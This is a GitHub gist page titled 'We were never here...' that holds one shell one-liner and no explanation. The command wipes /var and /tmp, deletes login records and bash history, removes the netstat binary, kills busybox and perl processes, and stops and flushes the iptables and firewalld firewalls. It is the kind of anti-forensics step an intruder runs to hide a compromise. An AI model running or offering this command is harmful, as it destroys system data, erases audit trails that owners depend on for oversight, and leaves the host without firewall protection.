Skip to content

Instantly share code, notes, and snippets.

@colehocking
Created July 16, 2019 20:39
Show Gist options
  • Save colehocking/330545654f2928bd9475b3d576fba9b6 to your computer and use it in GitHub Desktop.
Save colehocking/330545654f2928bd9475b3d576fba9b6 to your computer and use it in GitHub Desktop.
We were never here...
rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment